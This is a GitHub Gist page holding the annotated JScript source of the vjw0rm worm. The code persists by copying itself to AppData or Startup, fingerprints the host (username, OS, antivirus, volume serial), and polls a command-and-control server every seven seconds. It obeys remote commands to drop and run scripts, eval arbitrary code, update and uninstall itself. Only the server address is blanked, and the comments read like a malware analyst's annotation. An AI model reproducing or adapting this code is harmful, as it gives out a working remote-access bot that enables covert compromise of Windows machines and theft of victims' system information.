Last active
April 2, 2023 20:22
-
-
Save drole/c22fd13f524f2843c004ecabbce84bb5 to your computer and use it in GitHub Desktop.
vjw0rm
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var j = [ | |
'WScript.Shell', | |
'Scripting.FileSystemObject', | |
'Shell.Application', | |
'Microsoft.XMLHTTP' | |
]; | |
var g = [ | |
'HKCU', | |
'HKLM', | |
'HKCU\\vjw0rm', | |
'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\', | |
'HKLM\\SOFTWARE\\Classes\\', | |
'REG_SZ', | |
'\\defaulticon\\' | |
]; | |
var y = [ | |
'winmgmts:', | |
'win32_logicaldisk', | |
'Win32_OperatingSystem', | |
'AntiVirusProduct' | |
]; | |
var sh = Cr(0); //'WScript.Shell' | |
var fs = Cr(1); //'Scripting.FileSystemObject' | |
var spl = '|V|'; //command and control delimiter | |
var Ch = '\\'; | |
var VN = 'vjw0rm' + '_' + Ob(6); // bot ID - Ob(6) - Volume serial number | |
var fu = WScript.ScriptFullName; // script fullname | |
var wn = WScript.ScriptName; // script name | |
var U; | |
try { // attempts to create HKCU\\vjw0rm registry | |
U = sh.RegRead(g[2]); | |
} catch (err) { | |
var sv = fu.split('\\'); | |
if (':\\' + sv[1] == ':\\' + wn) { // if first layer directory == to script name | |
U = 'TRUE'; | |
sh.RegWrite(g[2], U, g[5]); //then set REG_SZ TRUE | |
} else { | |
U = 'FALSE'; | |
sh.RegWrite(g[2], U, g[5]); //then set REG_SZ FALSE | |
} | |
} | |
Ns(); // Install malware | |
do { // | |
try { | |
var P = Pt('Vre', ''); // send POST request to the command and control server | |
P = P.split(spl); // get command from the control server | |
if (P[0] === 'Cl') { // Cl = Close Bot script | |
WScript.Quit(1); | |
} | |
if (P[0] === 'Sc') { // Sc = Save script file to %temp% and run | |
var s2 = Ex('temp') + '\\' + P[2]; | |
var fi = fs.CreateTextFile(s2, true); | |
fi.Write(P[1]); | |
fi.Close(); | |
sh.run(s2); | |
} | |
if (P[0] === 'Ex') { // Ex = execute script using Eval | |
eval(P[1]); | |
} | |
if (P[0] === 'Rn') { // Rn = rename bot | |
var ri = fs.OpenTextFile(fu, 1); | |
var fr = ri.ReadAll(); | |
ri.Close(); | |
VN = VN.split('_'); | |
fr = fr.replace(VN[0], P[1]); | |
var wi = fs.OpenTextFile(fu, 2, false); | |
wi.Write(fr); | |
wi.Close(); | |
sh.run('wscript.exe //B "' + fu + '"'); | |
WScript.Quit(1); | |
} | |
if (P[0] === 'Up') { //Up = update bot | |
var s2 = Ex('temp') + '\\' + P[2]; | |
var ctf = fs.CreateTextFile(s2, true); | |
var gu = P[1]; | |
gu = gu.replace('|U|', '|V|'); | |
ctf.Write(gu); | |
ctf.Close(); | |
sh.run('wscript.exe //B "' + s2 + '"', 6); | |
WScript.Quit(1); | |
} | |
if (P[0] === 'Un') { // Un = uninstall bot | |
var s2 = P[1]; | |
var vdr = Ex('Temp') + Ch + wn; | |
var regi = 'Nothing!'; | |
s2 = s2.replace('%f', fu).replace('%n', wn).replace('%sfdr', vdr).replace('%RgNe%', regi); | |
eval(s2); | |
WScript.Quit(1); | |
} | |
if (P[0] === 'RF') { // RF = same as Sc | |
var s2 = Ex('temp') + '\\' + P[2]; | |
var fi = fs.CreateTextFile(s2, true); | |
fi.Write(P[1]); | |
fi.Close(); | |
sh.run(s2); | |
} | |
} catch (err) { | |
} | |
WScript.Sleep(7000); // phone home every 7 seconds | |
} while (true); | |
function Ex(S) { | |
return sh.ExpandEnvironmentStrings('%' + S + '%'); | |
} | |
function Pt(C, A) { // send POST request to command and control | |
var X = Cr(3); | |
X.open('POST', '<control server>' + C, false); | |
X.SetRequestHeader('User-Agent:', nf()); // user agent = is the system information with the format: vjw0rm_<volume serial number>\<Username>\<OS name>\<AV product installed>\<VBC.exe installed - boolean>\<HKCU\\vjw0rm value> | |
X.send(A); | |
return X.responsetext; | |
} | |
function nf() { // get system information | |
var s, NT, i; | |
if (fs.fileexists(Ex('Windir') + '\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe')) { | |
NT = 'YES'; | |
} else { | |
NT = 'NO'; | |
} | |
//system information format: vjw0rm_<volume serial number>\<Username>\<OS name>\<AV product installed>\<VBC.exe installed - boolean>\<HKCU\\vjw0rm value> | |
s = VN + Ch + Ex('COMPUTERNAME') + Ch + Ex('USERNAME') + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch; | |
return s; | |
} | |
function Cr(N) { | |
return new ActiveXObject(j[N]); | |
} | |
function Ob(N) { | |
var s; | |
if (N == 2) { // Get operating system | |
s = GetObject(y[0]).InstancesOf(y[2]); | |
var en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
var it = en.item(); | |
return it.Caption; | |
break; | |
} | |
} | |
if (N == 4) { // get Antivirus prodyct installed | |
var wmg = 'winmgmts:\\\\localhost\\root\\securitycenter'; | |
s = GetObject(wmg).InstancesOf(y[3]); | |
var en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
var it = en.item(); | |
var str = it.DisplayName; | |
} | |
if (str !== '') { | |
wmg = wmg + '2'; | |
s = GetObject(wmg).InstancesOf(y[3]); //y[3] = AntiVirusProduct | |
en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
it = en.item(); | |
return it.DisplayName; | |
} | |
} else { | |
return it.DisplayName; | |
} | |
} | |
if (N == 6) { // get Volume serial number | |
s = GetObject(y[0]).InstancesOf(y[1]); | |
var en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
var it = en.item(); | |
return it.volumeserialnumber; | |
break; | |
} | |
} | |
} | |
function Ns() { // install bot to appdata and startup folder | |
var dr = Ex('APPDATA') + Ch + wn; | |
try { | |
fs.CopyFile(fu, dr, true); | |
} catch (err) { | |
try { | |
var ap = Cr(2); | |
fs.CopyFile(fu, ap.NameSpace(7).Self.Path + '\\' + wn, true); | |
} catch (err) { | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment